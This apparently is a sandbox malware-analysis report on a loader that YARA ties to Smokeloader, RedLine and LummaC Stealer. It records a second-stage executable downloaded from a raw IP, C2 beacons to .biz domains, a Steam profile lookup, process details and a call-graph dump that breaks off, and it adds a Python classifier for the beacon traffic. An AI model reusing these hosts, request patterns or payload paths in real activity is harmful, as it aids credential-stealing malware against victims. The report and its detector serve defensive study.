Dec 17, 2024 09:42:57.265892029 CET | 1.1.1.1 | 192.168.2.10 | 0x9960 | No error (0) | steamcommunity.com | | 104.121.10.34 | A (IP address) | IN (0x0001) | false
• post-to-me.com
• immureprech.biz
• deafeninggeh.biz
• steamcommunity.com
• 176.113.115.19
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49715 | 176.113.115.19 | 80 | 7736 | C:\Users\user\Desktop\hpEAJnNwCB.exe
Timestamp | Bytes transferred | Direction | Data
Dec 17, 2024 09:42:42.682439089 CET | 85 | OUT | GET /ScreenUpdateSync.exe HTTP/1.1
User-Agent: ShareScreen
Host: 176.113.115.19
Dec 17, 2024 09:42:44.008409977 CET | 1236 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:42:43 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Tue, 17 Dec 2024 08:30:02 GMT
ETag: "59c00-629731a74cc27"
Accept-Ranges: bytes
Content-Length: 367616
Content-Type: application/x-msdos-program


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.10 | 49709 | 104.21.56.70 | 443 | 7736 | C:\Users\user\Desktop\hpEAJnNwCB.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 08:42:41 UTC | 90 | OUT | GET /track_prt.php?sub=0&cc=DE HTTP/1.1
User-Agent: ShareScreen
Host: post-to-me.com
2024-12-17 08:42:42 UTC | 802 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:42:42 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
X-Powered-By: PHP/5.4.16
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lZbluHXwiRYMEXthXU7Zl%2B6YzDRw6%2F8oiruYmGoADtR78yomJ9DKDhrBn62pgesHxBnFXQkGxm7x3XLEdW72y9VnY%2BdwTgeXqt0lN21qyEtSYTG%2F6r839Tp1LmIpdHxlqQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8f359f0d0e0542e4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1562&rtt_var=593&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=728&delivery_rate=1831869&cwnd=228&unsent_bytes=0&cid=0f74ebd09569d78b&ts=871&x=0"
2024-12-17 08:42:42 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-12-17 08:42:42 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.10 | 49736 | 45.77.249.79 | 443 | 7968 | C:\Users\user\AppData\Local\Temp\91B1.tmp.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-17 08:42:51 UTC | 262 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: immureprech.biz
2024-12-17 08:42:51 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-17 08:42:52 UTC | 94 | IN | HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:42:52 GMT
Content-Length: 0
Connection: close


Session ID: 2
Source IP: 192.168.2.10
Source Port: 49748
Destination IP: 104.131.68.180
Destination Port: 443
PID: 7968
Process: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-17 08:42:55 UTC / 263 / OUT
POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: deafeninggeh.biz
2024-12-17 08:42:55 UTC / 8 / OUT
Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-12-17 08:42:55 UTC / 94 / IN
HTTP/1.1 200 OK
Date: Tue, 17 Dec 2024 08:42:55 GMT
Content-Length: 0
Connection: close


Session ID: 3
Source IP: 192.168.2.10
Source Port: 49756
Destination IP: 104.121.10.34
Destination Port: 443
PID: 7968
Process: C:\Users\user\AppData\Local\Temp\91B1.tmp.exe

Timestamp / Bytes transferred / Direction / Data
2024-12-17 08:42:58 UTC / 219 / OUT
GET /profiles/76561199724331900 HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: steamcommunity.com
2024-12-17 08:42:59 UTC / 1905 / IN
HTTP/1.1 200 OK
Server: nginx
Content-Type: text/html; charset=UTF-8
Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache
Date: Tue, 17 Dec 2024 08:42:59 GMT
Content-Length: 25665
Connection: close
Set-Cookie: sessionid=2ea280fd0ecd38148ff05529; Path=/; Secure; SameSite=None
Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
2024-12-17 08:42:59 UTC / 14479 / IN
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
2024-12-17 08:42:59 UTC / 11186 / IN
Data Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>
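The two request shapes captured in sessions 2 and 3 (the `POST /api` beacon carrying `act=life` to deafeninggeh.biz, and the `GET /profiles/...` fetch from steamcommunity.com, both from PID 7968) are the network indicators a responder would want to match in proxy or PCAP-derived logs. The classifier below is an added example and is not part of the Joe Sandbox report. The three sample requests are constructed to mirror the captured ones (plus one benign browser request for contrast); the heuristics, in particular "Chrome User-Agent but none of Chrome's Accept headers", are the editor's assumptions about what separates this beacon from real browser traffic. LummaC is publicly documented to use Steam profile pages as a dead-drop resolver for its C2 domain; the classifier flags the fetch but does not assert that role for this sample.

```python
"""
Flag LummaC-style beacons and Steam profile fetches in raw HTTP requests.

Added example, not part of the Joe Sandbox report. BEACON, STEAM_FETCH and
BENIGN are CONSTRUCTED to mirror the report's sessions 2 and 3; the
heuristics below are assumptions, not a vendor signature.
"""
from dataclasses import dataclass
from typing import Dict, List
from urllib.parse import parse_qs


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: Dict[str, str]   # header names lower-cased
    body: str


def parse_request(raw: str) -> HttpRequest:
    """Split a raw HTTP/1.x request (CRLF line endings) into its parts."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers: Dict[str, str] = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


# Headers a real Chrome build sends on every request. The captured beacon
# claims Chrome/119 yet sends none of them (assumption: good discriminator).
BROWSER_HEADERS = ("accept", "accept-encoding", "accept-language")


def classify(raw: str) -> List[str]:
    """Return the reasons a request resembles the report's C2 traffic."""
    req = parse_request(raw)
    host = req.headers.get("host", "").lower()
    reasons: List[str] = []

    # Session 2: POST /api, form-encoded body "act=<verb>" (verb "life" here).
    ctype = req.headers.get("content-type", "")
    if (req.method == "POST" and req.path == "/api"
            and ctype.startswith("application/x-www-form-urlencoded")):
        verb = parse_qs(req.body).get("act", [None])[0]
        if verb is not None:
            reasons.append(f"lumma-beacon:act={verb}")

    # Session 3: a Steam profile page fetched by a non-browser process.
    if (req.method == "GET" and host.endswith("steamcommunity.com")
            and req.path.startswith("/profiles/")):
        reasons.append("steam-profile-fetch")

    ua = req.headers.get("user-agent", "")
    if "Chrome/" in ua and not any(h in req.headers for h in BROWSER_HEADERS):
        reasons.append("browser-ua-without-browser-headers")

    return reasons


UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
      "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")

# Constructed from session 2 of the report.
BEACON = (
    "POST /api HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    f"User-Agent: {UA}\r\n"
    "Content-Length: 8\r\n"
    "Host: deafeninggeh.biz\r\n"
    "\r\n"
    "act=life"
)

# Constructed from session 3 of the report.
STEAM_FETCH = (
    "GET /profiles/76561199724331900 HTTP/1.1\r\n"
    "Connection: Keep-Alive\r\n"
    f"User-Agent: {UA}\r\n"
    "Host: steamcommunity.com\r\n"
    "\r\n"
)

# Constructed benign request: same User-Agent, but a real browser's headers.
BENIGN = (
    "GET /index.html HTTP/1.1\r\n"
    "Host: example.com\r\n"
    f"User-Agent: {UA}\r\n"
    "Accept: text/html,application/xhtml+xml\r\n"
    "Accept-Encoding: gzip, deflate, br\r\n"
    "Accept-Language: en-US,en;q=0.9\r\n"
    "\r\n"
)

if __name__ == "__main__":
    for name, raw in (("beacon", BEACON), ("steam", STEAM_FETCH), ("benign", BENIGN)):
        print(name, classify(raw))
```

The `act=` check is deliberately loose (any verb) because the report only shows the `life` keep-alive; a production rule would pair it with the destination host or the TLS SNI rather than the path alone.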



                                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                                          Start time:03:42:36
                                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\Desktop\hpEAJnNwCB.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\Desktop\hpEAJnNwCB.exe"
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          File size:435'712 bytes
                                                                                                                                                                                                                                          MD5 hash:07A0B87962FBEE50D2ADC913F06A3E3B
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                                          Target ID:3
                                                                                                                                                                                                                                          Start time:03:42:44
                                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                                          Path:C:\Users\user\AppData\Local\Temp\91B1.tmp.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:"C:\Users\user\AppData\Local\Temp\91B1.tmp.exe"
                                                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                                                          File size:367'616 bytes
                                                                                                                                                                                                                                          MD5 hash:CC2566EAE03240FFC314E5BEE2DC4D26
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Yara matches:
                                                                                                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000003.1390576306.00000000024E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          • Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                                          Antivirus matches:
                                                                                                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                                          Target ID:7
                                                                                                                                                                                                                                          Start time:03:42:59
                                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                                                                                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7968 -s 860
                                                                                                                                                                                                                                          Imagebase:0x9b0000
                                                                                                                                                                                                                                          File size:483'680 bytes
                                                                                                                                                                                                                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                                                          Has exited:true


                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                            Execution Coverage:2.2%
                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:3.8%
                                                                                                                                                                                                                                            Signature Coverage:5.6%
                                                                                                                                                                                                                                            Total number of Nodes:762
                                                                                                                                                                                                                                            Total number of Limit Nodes:22
execution_graph (rendered call graph; the raw node/edge dump is not reproduced). Call chains recoverable from the graph, by node address:

0x402c04 InternetOpenW -> 0x402c37 (labelled Concurrency::details::ResourceManager::DetermineTopology) -> 0x42defd (labelled std::_Locinfo::_Locinfo_ctor, 26 API calls, called three times) -> 0x402e29 InternetOpenUrlW -> 0x402e44 InternetCloseHandle, InternetCloseHandle -> 0x402e55 -> 0x40f8cf -> 0x40f8da IsProcessorFeaturePresent -> 0x40f911 SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess -> 0x402e64

0x249003c (memory at 0x2490000, outside the 0x400000 image) -> 0x2490e0f SetErrorMode, SetErrorMode -> 0x2490d90 -> 0x2490dbb GetPEB -> 0x2490238 VirtualAlloc -> 0x24902ce VirtualProtect -> 0x2490439 VirtualFree -> 0x24905f4 LoadLibraryA / 0x24904e3 LoadLibraryA -> 0x24908c7

0x40fc06 (CRT startup) -> 0x40fc12 CallCatchBlock -> 0x40fff3 -> 0x41077b IsProcessorFeaturePresent -> 0x428827 (10 API calls) / 0x4317a1 IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess, TerminateProcess -> 0x428850 (8 API calls); 0x40fc82 ___scrt_is_nonwritable_in_current_image, ___scrt_release_startup_lock -> 0x42a366 (167 API calls) -> 0x4105ed -> 0x426830 -> 0x410600 GetStartupInfoW -> 0x410623 GetModuleHandleW -> 0x410182 (13 API calls); exception helpers 0x42fcee, 0x42fc92 (5 API calls, __ExceptionPtr::_RethrowException); _Atexit helpers 0x42ffc9, 0x42ff7b, 0x42ff6c (28 API calls each), 0x4104d3 (4 API calls)

0x432785 (CRT file I/O, __wsopen_s / __fread_nolock path) -> 0x432553 -> 0x4326c7 / 0x43c8ce (170 API calls); 0x43d01c -> 0x43c9f1 -> 0x43c9fd CallCatchBlock -> 0x43cfcb -> 0x43f941 -> 0x434faa (10 API calls) -> 0x43f98a MultiByteToWideChar (GetLastError at 0x43f9a9 on failure) -> 0x4336a7 (21 API calls) -> 0x43f9c8 MultiByteToWideChar (GetLastError at 0x43f9dd on failure) -> 0x43346a _free; 0x43d03c -> 0x43cd9f -> 0x43cd2f -> 0x42ffdf (26 API calls) -> 0x42a5ca (11 API calls, _Atexit); 0x43977e / 0x42eab6 -> 0x43cd0a CreateFileW -> 0x43d162 GetFileType (GetLastError at 0x43d16d / 0x43d137 on failure) -> 0x4396c7 (21 API calls) -> 0x43d17b CloseHandle; 0x43cf1b (169 API calls), 0x43cabd (167 API calls), 0x4335cd (29 API calls) -> 0x43d2dd CloseHandle -> 0x43cd0a CreateFileW -> 0x43d312 GetLastError -> 0x439890 (21 API calls); 0x43ca91 LeaveCriticalSection; 0x433475 HeapFree -> 0x433490 GetLastError, __dosmaperr

Shared helpers: 0x42eac9 (20 API calls, __Wcscoll), 0x42a59d (26 API calls, _Deallocate), 0x42ea93 (20 API calls)
64630->64558 64632 43cf1a 64634 43978a CallCatchBlock 64633->64634 64677 42e3ed EnterCriticalSection 64634->64677 64636 4397d8 64678 439887 64636->64678 64637 4397b6 64681 43955d 21 API calls 3 library calls 64637->64681 64638 439791 64638->64636 64638->64637 64643 439824 EnterCriticalSection 64638->64643 64641 439801 __fread_nolock 64641->64561 64642 4397bb 64642->64636 64682 4396a4 EnterCriticalSection 64642->64682 64643->64636 64644 439831 LeaveCriticalSection 64643->64644 64644->64638 64646->64576 64647->64562 64648->64592 64649->64568 64650->64562 64651->64581 64652->64562 64653->64577 64654->64585 64655->64583 64656->64584 64657->64588 64658->64597 64659->64595 64660->64599 64661->64597 64663 43cd47 64662->64663 64664 43cd62 64663->64664 64675 42eac9 20 API calls __Wcscoll 64663->64675 64664->64622 64666 43cd86 64676 42a59d 26 API calls _Deallocate 64666->64676 64668 43cd91 64668->64622 64669->64620 64670->64617 64671->64627 64672->64623 64673->64626 64674->64632 64675->64666 64676->64668 64677->64638 64683 42e435 LeaveCriticalSection 64678->64683 64680 43988e 64680->64641 64681->64642 64682->64636 64683->64680 64684->64605 64685 b09a08 64686 b09a5c 64685->64686 64687 b09b4c 64686->64687 64690 b09b2e 64686->64690 64691 b09b3d 64690->64691 64694 b0a2ce 64691->64694 64699 b0a2e9 64694->64699 64695 b0a2f2 CreateToolhelp32Snapshot 64696 b0a30e Module32First 64695->64696 64695->64699 64697 b0a31d 64696->64697 64700 b09b2d 64696->64700 64701 b09f8d 64697->64701 64699->64695 64699->64696 64702 b09fb8 64701->64702 64703 b0a001 64702->64703 64704 b09fc9 VirtualAlloc 64702->64704 64703->64703 64704->64703 64705 43410a 64706 434116 CallCatchBlock 64705->64706 64707 434122 64706->64707 64708 434139 64706->64708 64739 42eac9 20 API calls __Wcscoll 64707->64739 64718 42caff EnterCriticalSection 64708->64718 64711 434127 64740 42a59d 26 API calls _Deallocate 64711->64740 64712 434149 64719 434186 64712->64719 64715 434155 64741 43417c LeaveCriticalSection __fread_nolock 
64715->64741 64717 434132 __fread_nolock 64718->64712 64720 434194 64719->64720 64721 4341ae 64719->64721 64752 42eac9 20 API calls __Wcscoll 64720->64752 64742 432908 64721->64742 64724 434199 64753 42a59d 26 API calls _Deallocate 64724->64753 64725 4341b7 64749 4347d3 64725->64749 64727 4341a4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64727->64715 64730 4342bb 64732 4342c8 64730->64732 64736 43426e 64730->64736 64731 43423f 64734 43425c 64731->64734 64731->64736 64755 42eac9 20 API calls __Wcscoll 64732->64755 64754 43449f 31 API calls 4 library calls 64734->64754 64736->64727 64756 43431b 30 API calls 2 library calls 64736->64756 64737 434266 64737->64727 64739->64711 64740->64717 64741->64717 64743 432914 64742->64743 64744 432929 64742->64744 64757 42eac9 20 API calls __Wcscoll 64743->64757 64744->64725 64746 432919 64758 42a59d 26 API calls _Deallocate 64746->64758 64748 432924 64748->64725 64759 434650 64749->64759 64751 4341d3 64751->64727 64751->64730 64751->64731 64752->64724 64753->64727 64754->64737 64755->64727 64756->64727 64757->64746 64758->64748 64760 43465c CallCatchBlock 64759->64760 64761 434664 64760->64761 64762 43467c 64760->64762 64794 42eab6 20 API calls __Wcscoll 64761->64794 64764 434730 64762->64764 64769 4346b4 64762->64769 64799 42eab6 20 API calls __Wcscoll 64764->64799 64765 434669 64795 42eac9 20 API calls __Wcscoll 64765->64795 64768 434735 64800 42eac9 20 API calls __Wcscoll 64768->64800 64784 4396a4 EnterCriticalSection 64769->64784 64772 43473d 64801 42a59d 26 API calls _Deallocate 64772->64801 64773 4346ba 64775 4346f3 64773->64775 64776 4346de 64773->64776 64785 434755 64775->64785 64796 42eac9 20 API calls __Wcscoll 64776->64796 64777 434671 __fread_nolock 64777->64751 64780 4346e3 64797 42eab6 20 API calls __Wcscoll 64780->64797 64781 4346ee 64798 434728 LeaveCriticalSection __wsopen_s 64781->64798 64784->64773 64802 439921 64785->64802 64787 434767 64788 434780 SetFilePointerEx 64787->64788 64789 43476f 64787->64789 64791 
434774 64788->64791 64792 434798 GetLastError 64788->64792 64815 42eac9 20 API calls __Wcscoll 64789->64815 64791->64781 64816 42ea93 20 API calls 2 library calls 64792->64816 64794->64765 64795->64777 64796->64780 64797->64781 64798->64777 64799->64768 64800->64772 64801->64777 64803 439943 64802->64803 64804 43992e 64802->64804 64808 439968 64803->64808 64819 42eab6 20 API calls __Wcscoll 64803->64819 64817 42eab6 20 API calls __Wcscoll 64804->64817 64807 439933 64818 42eac9 20 API calls __Wcscoll 64807->64818 64808->64787 64809 439973 64820 42eac9 20 API calls __Wcscoll 64809->64820 64812 43993b 64812->64787 64813 43997b 64821 42a59d 26 API calls _Deallocate 64813->64821 64815->64791 64816->64791 64817->64807 64818->64812 64819->64809 64820->64813 64821->64812 64822 4332de 64823 4332eb 64822->64823 64826 433303 64822->64826 64872 42eac9 20 API calls __Wcscoll 64823->64872 64825 4332f0 64873 42a59d 26 API calls _Deallocate 64825->64873 64828 43335e 64826->64828 64836 4332fb 64826->64836 64874 434ccd 21 API calls 2 library calls 64826->64874 64830 432908 __fread_nolock 26 API calls 64828->64830 64831 433376 64830->64831 64842 432e16 64831->64842 64833 43337d 64834 432908 __fread_nolock 26 API calls 64833->64834 64833->64836 64835 4333a9 64834->64835 64835->64836 64837 432908 __fread_nolock 26 API calls 64835->64837 64838 4333b7 64837->64838 64838->64836 64839 432908 __fread_nolock 26 API calls 64838->64839 64840 4333c7 64839->64840 64841 432908 __fread_nolock 26 API calls 64840->64841 64841->64836 64843 432e22 CallCatchBlock 64842->64843 64844 432e42 64843->64844 64845 432e2a 64843->64845 64846 432f08 64844->64846 64850 432e7b 64844->64850 64941 42eab6 20 API calls __Wcscoll 64845->64941 64948 42eab6 20 API calls __Wcscoll 64846->64948 64849 432e2f 64942 42eac9 20 API calls __Wcscoll 64849->64942 64853 432e8a 64850->64853 64854 432e9f 64850->64854 64851 432f0d 64949 42eac9 20 API calls __Wcscoll 64851->64949 64943 42eab6 20 API calls __Wcscoll 64853->64943 64875 
4396a4 EnterCriticalSection 64854->64875 64858 432e97 64950 42a59d 26 API calls _Deallocate 64858->64950 64859 432e8f 64944 42eac9 20 API calls __Wcscoll 64859->64944 64860 432ea5 64863 432ec1 64860->64863 64864 432ed6 64860->64864 64861 432e37 __fread_nolock 64861->64833 64945 42eac9 20 API calls __Wcscoll 64863->64945 64876 432f29 64864->64876 64868 432ed1 64947 432f00 LeaveCriticalSection __wsopen_s 64868->64947 64869 432ec6 64946 42eab6 20 API calls __Wcscoll 64869->64946 64872->64825 64873->64836 64874->64828 64875->64860 64877 432f53 64876->64877 64878 432f3b 64876->64878 64880 4332bd 64877->64880 64883 432f98 64877->64883 64960 42eab6 20 API calls __Wcscoll 64878->64960 64978 42eab6 20 API calls __Wcscoll 64880->64978 64881 432f40 64961 42eac9 20 API calls __Wcscoll 64881->64961 64886 432fa3 64883->64886 64887 432f48 64883->64887 64894 432fd3 64883->64894 64885 4332c2 64979 42eac9 20 API calls __Wcscoll 64885->64979 64962 42eab6 20 API calls __Wcscoll 64886->64962 64887->64868 64890 432fb0 64980 42a59d 26 API calls _Deallocate 64890->64980 64891 432fa8 64963 42eac9 20 API calls __Wcscoll 64891->64963 64895 432fec 64894->64895 64896 433012 64894->64896 64897 43302e 64894->64897 64895->64896 64930 432ff9 64895->64930 64964 42eab6 20 API calls __Wcscoll 64896->64964 64967 4336a7 21 API calls 3 library calls 64897->64967 64899 433017 64965 42eac9 20 API calls __Wcscoll 64899->64965 64903 433045 64905 43346a _free 20 API calls 64903->64905 64904 43301e 64966 42a59d 26 API calls _Deallocate 64904->64966 64909 43304e 64905->64909 64907 43320d 64910 433211 ReadFile 64907->64910 64908 433197 64908->64907 64911 4331b0 GetConsoleMode 64908->64911 64912 43346a _free 20 API calls 64909->64912 64913 433285 GetLastError 64910->64913 64914 43322b 64910->64914 64911->64907 64915 4331c1 64911->64915 64916 433055 64912->64916 64917 433292 64913->64917 64918 4331e9 64913->64918 64914->64913 64919 433202 64914->64919 64915->64910 64920 4331c7 ReadConsoleW 64915->64920 64921 
